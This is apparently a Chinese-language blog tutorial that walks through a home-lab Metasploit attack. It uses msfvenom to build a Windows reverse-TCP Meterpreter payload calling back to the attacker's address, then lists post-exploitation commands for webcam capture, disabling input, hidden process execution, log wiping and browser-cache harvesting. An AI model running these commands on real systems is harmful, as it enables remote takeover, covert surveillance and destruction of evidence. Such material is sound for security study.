首頁>技術>

Meterpreter

Meterpreter是Metasploit框架中的一個擴充套件模組,作為溢位成功以後的攻擊載荷使用,攻擊載荷在溢位攻擊成功以後給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個Meterpreter shell的連結。Meterpreter shell作為滲透模組有很多有用的功能,比如新增一個使用者、隱藏一些東西、開啟shell、得到使用者密碼、上傳下載遠端主機的檔案、執行cmd.exe、捕捉螢幕、得到遠端控制權、捕獲按鍵資訊、清除應用程式、顯示遠端主機的系統資訊、顯示遠端機器的網路介面和IP地址等資訊。

檢視kali和window的ip

在kali終端ifconfig,ip是192.168.0.103

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=5555 -f exe -o met.exe

生成met.exe可執行的exe,並點選執行。

複製到win10主機,需要關閉window的防火牆

exploit命令發起攻擊

在window桌面不小心放在重要的檔案,直接cat查詢

補充下,msfconsole的一些命令,只有控制了window,下面的命令都可以執行。

# 讓他不能用滑鼠uictl開關鍵盤/滑鼠uictl [enable/disable] [keyboard/mouse/all] #開啟或禁止鍵盤/滑鼠uictl disable mouse #禁用滑鼠uictl disable keyboard #禁用鍵盤 # 如果開了攝像頭拍照webcam攝像頭命令webcam_list #檢視攝像頭webcam_snap #通過攝像頭拍照webcam_stream #通過攝像頭開啟視訊execute執行檔案execute #在目標機中執行檔案execute -H -i -f cmd.exe # 建立新程序cmd.exe,-H不可見,-i互動# clearav清除日誌clearav #清除windows中的應用程式日誌、系統日誌、安全日誌# 基本網路命令ipconfig/ifconfignetstat –anoarpgetproxy #檢視代理資訊route #檢視路由# 資訊收集的指令碼位於:/usr/share/metasploit-framework/modules/post/windows/gather/usr/share/metasploit-framework/modules/post/linux/gather# 資訊收集的指令碼較多,僅列幾個常用的:run post/windows/gather/checkvm #是否虛擬機器run post/linux/gather/checkvm #是否虛擬機器run post/windows/gather/forensics/enum_drives #檢視分割槽run post/windows/gather/enum_applications #獲取安裝軟體資訊run post/windows/gather/dumplinks #獲取最近的檔案操作run post/windows/gather/enum_ie #獲取IE快取run post/windows/gather/enum_chrome #獲取Chrome快取run post/windows/gather/enum_patches #補丁資訊run post/windows/gather/enum_domain #查詢域控

其實很弄別人是不行的,別人怎麼會傻傻的關防火牆。

  • BSA-TRITC(10mg/ml) TRITC-BSA 牛血清白蛋白改性標記羅丹明
  • 面試官:SpringBoot中關於日誌工具的使用,我想問你幾個常見問題